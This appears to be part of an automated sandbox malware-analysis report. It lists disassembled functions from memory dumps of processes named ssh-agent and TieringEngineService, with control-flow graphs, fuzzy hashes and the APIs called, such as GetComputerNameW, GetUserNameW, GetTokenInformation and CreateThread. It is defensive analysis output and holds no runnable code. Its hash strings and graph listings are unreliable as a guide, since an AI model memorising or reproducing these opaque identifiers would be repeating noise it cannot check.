                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 2ED1F431518F0A8BCB68EF58DC457EEBBD1FBA0310F585A1F9846C31E4DA749A45C6C2
                                                                                                                                                                      Function 004E8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 4e8070-4e817e 81 4e813d-4e81a5 79->81 82 4e8180 79->82 88 4e81bd-4e81ca 81->88 89 4e81a7 81->89 82->81 85 4e8161 82->85 87 4e8163-4e8170 call 517164 85->87 93 4e8186 CloseHandle 87->93 94 4e8172 87->94 96 4e80f3 88->96 97 4e81d0 88->97 95 4e818c-4e8192 93->95 94->95 98 4e8194 95->98 99 4e8115-4e8118 95->99 100 4e808c 96->100 101 4e80f5 96->101 109 4e81fe-4e8201 GetTokenInformation 97->109 110 4e80c3 97->110 98->99 103 4e819a 98->103 107 4e8119-4e811a 99->107 108 4e80a7 99->108 104 4e808e-4e8184 100->104 101->100 112 4e8077 101->112 103->81 104->93 104->95 107->108 111 4e811c 107->111 116 4e820f 109->116 125 4e81b7 109->125 110->109 115 4e80c9 110->115 111->116 117 4e81d7-4e81de call 51715c 112->117 120 4e80ca-4e80d8 GetTokenInformation 115->120 116->104 122 4e8215-4e821e 116->122 123 4e81e3-4e81e6 117->123 124 4e810f 120->124 122->104 135 4e8224 122->135 123->120 137 4e8089 123->137 128 4e812d 124->128 129 4e8111 124->129 125->116 127 4e81b9-4e81bb 125->127 127->88 132 4e80a8 128->132 133 4e8133-4e81f0 128->133 129->128 134 4e8113 129->134 138 4e80aa-4e80ad 132->138 140 4e80da-4e80f1 133->140 141 4e81f6 133->141 134->99 135->117 139 4e8226 135->139 137->120 142 4e808b 137->142 138->87 143 4e80b3-4e8203 138->143 139->117 144 4e8228-4e82ee call 4e5d90 139->144 140->138 141->140 146 4e81fc 141->146 142->100 143->87 149 4e8209 143->149 154 4e830c-4e8320 call 4e5d90 call 4eec00 144->154 155 4e82f0 144->155 146->109 158 4e82f7-4e82fc call 4e5d90 154->158 171 4e8322 154->171 155->154 156 4e82f2 155->156 156->158 165 4e8302 158->165 166 4e8253-4e8265 call 501280 158->166 165->166 169 4e8308-4e830a 165->169 173 4e826b 166->173 174 4e8328 166->174 169->154 171->158 172 4e8324-4e8326 171->172 172->174 173->174 177 4e823f-4e8243 173->177 178 4e82df-4e832b 174->178 179 4e8335 174->179 177->158 178->179 182 4e832d-4e8331 178->182 183 4e829b-4e829d 179->183 184 4e8287 179->184 182->179 184->183 186 4e824e-4e8252 184->186 186->166
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: 14ed87657ee62c2b29eba7dbf53c154d78ff35c268286476c9dc755dd2d50452
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: C3610E3050CAC99FCF658B2B8814237BAA0BB55353F19469FE54EC22A1DF2C4C46934F
                                                                                                                                                                      Function 004E5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 4e5910-4e5968 189 4e596a 187->189 190 4e5915-4e5928 call 519970 187->190 189->190 193 4e5931-4f072c 189->193 196 4e59b8 call 500df0 190->196 198 4f0806-4f0809 193->198 199 4f0732-4f0738 193->199 201 4e59bd-4e59c2 call 4e5d90 196->201 206 4f079d-4f07a6 198->206 202 4f073e 199->202 203 4f0800 199->203 208 4e59c7-4e59ce 201->208 202->203 204 4f0744-4f0774 202->204 203->198 205 4f06b3-4f06b7 203->205 215 4f077a-4f081c 204->215 216 4f06d5-4f06d9 204->216 205->206 210 4f06bd 205->210 211 4f07a8 206->211 212 4f0791-4f0793 206->212 213 4e5a1a-4e5a26 call 4e5e10 208->213 214 4e59d0 208->214 210->206 217 4f06c3-4f07fe 210->217 211->212 219 4f07aa 211->219 218 4f07ca-4f07cc 212->218 213->196 232 4e5a08-4e5a0b 213->232 214->213 220 4e59d2-4e59d8 214->220 215->206 223 4f06df 216->223 224 4f06db 216->224 217->203 219->218 239 4e59d9-4e59de call 512190 220->239 223->206 224->223 227 4f06dd 224->227 227->223 231 4fc0cc 227->231 233 4fc0ce-4fc0d0 231->233 234 4fc0e8-4fc102 231->234 237 4e5a0d 232->237 238 4e5994-4e599c 232->238 236 4fc0d2-4fc0df 233->236 235 4fc104 234->235 234->236 235->236 247 4fc0e7 235->247 236->247 250 4e5932 237->250 251 4e5991 237->251 244 4e599e-4e59f7 238->244 245 4e5a02 238->245 239->238 255 4e59e0 239->255 244->245 253 4e597d 245->253 254 4e59d4-4e5a15 call 5011a0 245->254 252 4e59e4-4e59ec call 5121ac 250->252 251->250 256 4e5993 251->256 264 4e59ed 252->264 265 4e5a62-4e5a6e 252->265 253->254 258 4e597f-4e5981 253->258 255->238 259 4e59e2 255->259 256->238 263 4e5983-4e5a38 258->263 259->252 263->238 270 4e5a3e 263->270 264->263 268 4e59ee-4e59ef 264->268 271 4e5a75-4e5ab3 call 501280 265->271 272 4e5a70 265->272 268->263 274 4e59f1 268->274 270->239 280 4e5abb-4e5ac9 271->280 281 4e5ab5 271->281 272->271 276 4e5a72 272->276 274->190 276->271 283 4e5af2-4e5af5 280->283 281->280 282 4e5ab7-4e5ab9 281->282 282->280 286 4e5adb-4e5adc 283->286 287 4e5ad5 283->287 289 4e5a45-4e5a46 286->289 290 4e5ae2 286->290 287->286 288 4e5ad7-4e5ad9 287->288 288->286 290->289 291 4e5ae8 290->291 291->283
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 176d20ce2dfa6e1206a5e3775f786f51c02e6cda3db66efae998b82ea4a1d3d2
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: ECF1172071CE898FC669A71D58452BE7BD2FBD9314F58469BE04AC33D7DD289C06838B
                                                                                                                                                                      Function 004E5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 336 4e5b42-4e5b47 call 4e5d90 338 4e5b4c-4e5b52 336->338 340 4e5b0d 338->340 341 4e5c42-4e5c62 call 501280 338->341 340->341 342 4e5b13 340->342 358 4e5c26 341->358 359 4e5c14-4e5cc0 341->359 344 4e5c8f-4e5c96 342->344 346 4e5c98-4e5c9a 344->346 347 4e5c29 344->347 349 4e5c9c 346->349 350 4e5c2f-4e5c36 347->350 351 4e5cc2-4e5cc9 call 4e52a0 347->351 356 4e5d0e-4e5d18 349->356 357 4e5bfa 349->357 350->351 354 4e5c3c 350->354 366 4e5ccb 351->366 367 4e5c69 351->367 354->336 362 4e5d1a 356->362 363 4e5d54 356->363 357->356 361 4e5c00 357->361 358->359 365 4e5c28 358->365 359->351 361->359 370 4e5d4b-4e5d52 362->370 365->347 366->349 371 4e5ccd 366->371 368 4e5c6f 367->368 369 4e5b68-4e5d75 367->369 368->369 373 4e5c75 368->373 370->363 374 4e5d45-4e5d47 370->374 371->349 375 4e5ccf-4e5ce4 CreateThread 371->375 373->344 377 4e5d5f 374->377 378 4e5d49 374->378 379 4e5cea 375->379 380 4e5c01-4e5c05 375->380 381 4e5d65 377->381 378->370 378->377 379->380 382 4e5cf0-4e5cf6 379->382 384 4e5c20-4e5c68 380->384 387 4e5d37-4e5d41 380->387 381->381 382->384 387->370 388 4e5d43 387->388 388->363
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 5ca432cb1d534dc9a6b16f374130bc8802a46fd2c204f9bc8ce13c1a25c82c2e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: BE21AD3020CFC58FCB699B1B88A877626A1AB5531FF3845A79047CF392CA6C9C45931F
                                                                                                                                                                      Function 004E5B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 389 4e5b09-4e5d01 394 4e5d07 389->394 395 4e5bb4-4e5ce4 CreateThread 389->395 394->395 396 4e5d0d 394->396 400 4e5cea 395->400 401 4e5c01-4e5c05 395->401 399 4e5d37-4e5d41 396->399 402 4e5d4b-4e5d52 399->402 403 4e5d43 399->403 400->401 404 4e5cf0-4e5cf6 400->404 401->399 408 4e5c20-4e5c68 401->408 405 4e5d54 402->405 406 4e5d45-4e5d47 402->406 403->405 404->408 409 4e5d5f 406->409 410 4e5d49 406->410 413 4e5d65 409->413 410->402 410->409 413->413
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 0e19596be02101642d290634a7bf5cd63e8a65d74ff32c1e8e3327f81190055b
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 5001D23050DFC68FDB9657268C2877A7790AB1432FF3401ABC487CA291DAAC4902A71F
                                                                                                                                                                      Function 004E5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 414 4e5b87-4e5b99 CreateThread 415 4e5cff-4e5d01 414->415 416 4e5b1c-4e5b3b 414->416 417 4e5d07 415->417 418 4e5bb4-4e5ce4 CreateThread 415->418 416->415 417->418 419 4e5d0d 417->419 424 4e5cea 418->424 425 4e5c01-4e5c05 418->425 423 4e5d37-4e5d41 419->423 426 4e5d4b-4e5d52 423->426 427 4e5d43 423->427 424->425 428 4e5cf0-4e5cf6 424->428 425->423 432 4e5c20-4e5c68 425->432 429 4e5d54 426->429 430 4e5d45-4e5d47 426->430 427->429 428->432 433 4e5d5f 430->433 434 4e5d49 430->434 437 4e5d65 433->437 434->426 434->433 437->437
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: dbeb2e16f859bb0227576a5dc984b722c581526328c71f70f9e6cfc359dbde65
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 19E0863060DB844FDB999B2558203197AE5EB88319F1502CFC44ADB2D5CB6D1A06479B
                                                                                                                                                                      Function 004E599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 438 4e599b-4e599e 439 4e59b8 call 500df0 438->439 440 4e59f7 438->440 444 4e59bd-4e59c2 call 4e5d90 439->444 441 4e5a02 440->441 445 4e597d 441->445 446 4e59d4-4e5a15 call 5011a0 441->446 448 4e59c7-4e59ce 444->448 445->446 450 4e597f-4e5981 445->450 451 4e5a1a-4e5a26 call 4e5e10 448->451 452 4e59d0 448->452 454 4e5983-4e5a38 450->454 451->439 467 4e5a08-4e5a0b 451->467 452->451 455 4e59d2-4e59d8 452->455 461 4e5a3e 454->461 462 4e5994-4e599c 454->462 468 4e59d9-4e59de call 512190 455->468 461->468 462->441 466 4e599e 462->466 466->440 467->462 469 4e5a0d 467->469 468->462 475 4e59e0 468->475 473 4e5932 469->473 474 4e5991 469->474 476 4e59e4-4e59ec call 5121ac 473->476 474->473 477 4e5993 474->477 475->462 478 4e59e2 475->478 481 4e59ed 476->481 482 4e5a62-4e5a6e 476->482 477->462 478->476 481->454 483 4e59ee-4e59ef 481->483 484 4e5a75-4e5ab3 call 501280 482->484 485 4e5a70 482->485 483->454 487 4e59f1 call 519970 483->487 495 4e5abb-4e5ac9 484->495 496 4e5ab5 484->496 485->484 488 4e5a72 485->488 487->439 488->484 498 4e5af2-4e5af5 495->498 496->495 497 4e5ab7-4e5ab9 496->497 497->495 501 4e5adb-4e5adc 498->501 502 4e5ad5 498->502 504 4e5a45-4e5a46 501->504 505 4e5ae2 501->505 502->501 503 4e5ad7-4e5ad9 502->503 503->501 505->504 506 4e5ae8 505->506 506->498
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: b94851aa68514fcc40576e3f1d8ba20a74da344cded9cd26ff10a4dcf753a6d1
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: BC0126E0A0DEC0CFD61BEB1B44052FA2552BB9432EF2805AB904AC7293CA2C4D02974F
                                                                                                                                                                      Function 004E8090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 507 4e8090-4e8096 508 4e813c-4e81a5 507->508 509 4e8184 507->509 522 4e81bd-4e81ca 508->522 523 4e81a7 508->523 510 4e818c-4e8192 509->510 511 4e8186 CloseHandle 509->511 513 4e8194 510->513 514 4e8115-4e8118 510->514 511->510 513->514 515 4e819a 513->515 517 4e8119-4e811a 514->517 518 4e80a7 514->518 515->508 517->518 519 4e811c 517->519 521 4e820f 519->521 524 4e808e-4e8096 521->524 525 4e8215-4e821e 521->525 528 4e80f3 522->528 529 4e81d0 522->529 524->509 525->524 532 4e8224 525->532 530 4e808c 528->530 531 4e80f5 528->531 538 4e81fe-4e8201 GetTokenInformation 529->538 539 4e80c3 529->539 530->524 531->530 541 4e8077 531->541 536 4e8226 532->536 537 4e81d7-4e81e6 call 51715c 532->537 536->537 542 4e8228-4e82ee call 4e5d90 536->542 547 4e80ca-4e810f GetTokenInformation 537->547 556 4e8089 537->556 538->521 554 4e81b7 538->554 539->538 544 4e80c9 539->544 541->537 562 4e830c-4e8320 call 4e5d90 call 4eec00 542->562 563 4e82f0 542->563 544->547 558 4e812d 547->558 559 4e8111 547->559 554->521 557 4e81b9-4e81bb 554->557 556->547 564 4e808b 556->564 557->522 560 4e80a8 558->560 561 4e8133-4e81f0 558->561 559->558 565 4e8113 559->565 568 4e80aa-4e80ad 560->568 570 4e80da-4e80f1 561->570 571 4e81f6 561->571 572 4e82f7-4e82fc call 4e5d90 562->572 595 4e8322 562->595 563->562 567 4e82f2 563->567 564->530 565->514 567->572 574 4e8163-4e8170 call 517164 568->574 575 4e80b3-4e8203 568->575 570->568 571->570 576 4e81fc 571->576 587 4e8302 572->587 588 4e8253-4e8265 call 501280 572->588 574->511 589 4e8172 574->589 575->574 582 4e8209 575->582 576->538 587->588 593 4e8308-4e830a 587->593 597 4e826b 588->597 598 4e8328 588->598 589->510 593->562 595->572 596 4e8324-4e8326 595->596 596->598 597->598 601 4e823f-4e8243 597->601 602 4e82df-4e832b 598->602 603 4e8335 598->603 601->572 602->603 606 4e832d-4e8331 602->606 607 4e829b-4e829d 603->607 608 4e8287 603->608 606->603 608->607 610 4e824e-4e8252 608->610 610->588
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 2511c999b861efeef758db57839f487845bca07faddff315f40557303e3db930
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: AAC08C701289CA965E38038B0C0B1B2E6109302353B0C000F8C0E80321ED0C8E03019F
                                                                                                                                                                      Function 004E817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 611 4e817f 612 4e8184 611->612 613 4e818c-4e8192 612->613 614 4e8186 CloseHandle 612->614 615 4e8194 613->615 616 4e8115-4e8118 613->616 614->613 615->616 617 4e819a-4e81a5 615->617 618 4e8119-4e811a 616->618 619 4e80a7 616->619 629 4e81bd-4e81ca 617->629 630 4e81a7 617->630 618->619 620 4e811c 618->620 622 4e820f 620->622 624 4e808e-4e8096 622->624 625 4e8215-4e821e 622->625 624->612 625->624 631 4e8224 625->631 639 4e80f3 629->639 640 4e81d0 629->640 632 4e8226 631->632 633 4e81d7-4e81e6 call 51715c 631->633 632->633 636 4e8228-4e82ee call 4e5d90 632->636 654 4e80ca-4e810f GetTokenInformation 633->654 655 4e8089 633->655 659 4e830c-4e8320 call 4e5d90 call 4eec00 636->659 660 4e82f0 636->660 642 4e808c 639->642 643 4e80f5 639->643 650 4e81fe-4e8201 GetTokenInformation 640->650 651 4e80c3 640->651 642->624 643->642 652 4e8077 643->652 650->622 670 4e81b7 650->670 651->650 656 4e80c9 651->656 652->633 664 4e812d 654->664 665 4e8111 654->665 655->654 661 4e808b 655->661 656->654 669 4e82f7-4e82fc call 4e5d90 659->669 698 4e8322 659->698 660->659 663 4e82f2 660->663 661->642 663->669 667 4e80a8 664->667 668 4e8133-4e81f0 664->668 665->664 671 4e8113 665->671 676 4e80aa-4e80ad 667->676 678 4e80da-4e80f1 668->678 679 4e81f6 668->679 686 4e8302 669->686 687 4e8253-4e8265 call 501280 669->687 670->622 675 4e81b9-4e81bb 670->675 671->616 675->629 681 4e8163-4e8170 call 517164 676->681 682 4e80b3-4e8203 676->682 678->676 679->678 685 4e81fc 679->685 681->614 697 4e8172 681->697 682->681 693 4e8209 682->693 685->650 686->687 694 4e8308-4e830a 686->694 701 4e826b 687->701 702 4e8328 687->702 694->659 697->613 698->669 699 4e8324-4e8326 698->699 699->702 701->702 705 4e823f-4e8243 701->705 706 4e82df-4e832b 702->706 707 4e8335 702->707 705->669 706->707 710 4e832d-4e8331 706->710 711 4e829b-4e829d 707->711 712 4e8287 707->712 710->707 712->711 714 4e824e-4e8252 712->714 714->687
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 7001ae787e5aa22e0152516e00de58440ab77f5346329517ba0f713c27da1d53
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: E9C048A055868986593827CA2C0A1B2A5645712762B09462BAC0E9A362ED5C4D4346AE

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 007D52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 293 7d52a0-7d53fe 298 7d5404-7d540e 293->298 299 810d4c-810d4e 293->299 300 7d5424 298->300 301 7d539b 300->301 302 7d542a 300->302 304 7d539d-7d53a1 301->304 305 7d5413-7d5419 301->305 302->301 303 7d5430-7d5443 302->303 306 7d53a7 304->306 307 7d52b0-7d52b5 304->307 306->307 308 7d53ad 306->308 309 7d53af 308->309 310 7d53f3-7d53f9 308->310 311 7d53e0-7d53f1 309->311 314 7d532a 310->314 315 7d5355 310->315 311->305 311->310 314->315 316 7d532c-7d533f 314->316 318 7d52e8-7d5363 315->318 319 7d52d1-7d52e7 315->319 320 7d536b-7d5390 316->320 324 7d5365 318->324 325 7d53d1-7d53d5 318->325 319->318 329 7d53c3 320->329 330 7d5392-7d539a 320->330 324->325 328 7d5367-7d5369 324->328 325->304 327 7d53d7 325->327 327->311 331 7d5342-7d5345 327->331 328->320 330->304 332 7d534b 331->332 333 7d5400-7d540e 331->333 332->333 334 7d5351-7d5353 332->334 333->300 334->315
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 007D53C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 9f2ec5aa84b500c5ce5983bb28560dbb1fea8755c4e1822e0daf343880ac3ff2
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 4141E7A140DED58FD72A462448643707BB0AB223EAF9D05D7D4C2CB3E2E19C5C859767
                                                                                                                                                                      Function 007F0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 7f0080-7f0286 2 7f028c 0->2 3 7f0099-7f0575 0->3 5 7f0445 2->5 6 7f057b 3->6 7 7f0155 3->7 5->3 8 7f044b-7f0457 5->8 6->7 10 7f0581-7f0587 6->10 11 7f02ef-7f0495 call 7de050 * 2 7->11 9 7f0458-7f0472 GetComputerNameW 8->9 18 7f03ee-7f03f4 9->18 19 7f024c-7f0253 9->19 13 7f058b 10->13 11->9 55 7f043e 11->55 16 7f058c-7f0591 13->16 17 7f0181 VirtualFree 13->17 20 7f04ab-7f04af 16->20 21 7f0597 16->21 25 7f01a8-7f02ac call 807164 17->25 35 7f00da-7f023f 18->35 36 7f03fa 18->36 22 7f01e6 19->22 23 7f0255 19->23 46 7f04c7 20->46 21->20 27 7f059d 21->27 31 7f01ec-7f0313 call 80715c 22->31 32 7f02b1-7f02be 22->32 28 7f02d3 23->28 25->32 27->20 28->22 34 7f02d9 28->34 52 7f0318-7f031e 31->52 41 7f03bf-7f03d9 GetUserNameW 32->41 42 7f02c4 32->42 34->11 35->19 50 7f0241-7f024a 35->50 36->35 43 7f0400 36->43 48 7f0331 41->48 42->41 49 7f02ca 42->49 51 7fb1ee-7fb49f 43->51 58 7f04cc-7f04e6 call 809970 GetComputerNameW 46->58 53 7f0337 48->53 54 7f0171 48->54 49->28 50->19 50->32 56 7f0568-7f056b 52->56 57 7f0324 52->57 53->54 61 7f033d 53->61 59 7f013f-7f0146 54->59 60 7f0173 54->60 55->5 56->58 57->56 63 7f032a 57->63 70 7f04ec-7f0514 58->70 71 7f0131 58->71 59->13 65 7f0230 60->65 66 7f05d0-7f05d9 61->66 63->48 65->46 67 7f0236-7f05c2 65->67 66->51 67->46 74 7f05c8-7f05c9 67->74 70->56 72 7f0089-7f008c 71->72 73 7f0137 71->73 72->25 75 7f0092 72->75 73->72 76 7f013d 73->76 74->66 75->25 78 7f0098 75->78 76->17 76->59 78->3
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001E.00000002.2627366659.00000000007D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_30_2_7d0000_TieringEngineService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: a010ff8db0a7fd4c6fa25a8435d428d7a498676befa5c1418ce4233b8a32d1d1
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: F3D13631518B0D8BC728EF58C8457FAB3D1FBA0310F58461FDA46C7366DA78DA4586C2
                                                                                                                                                                      Function 007D8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

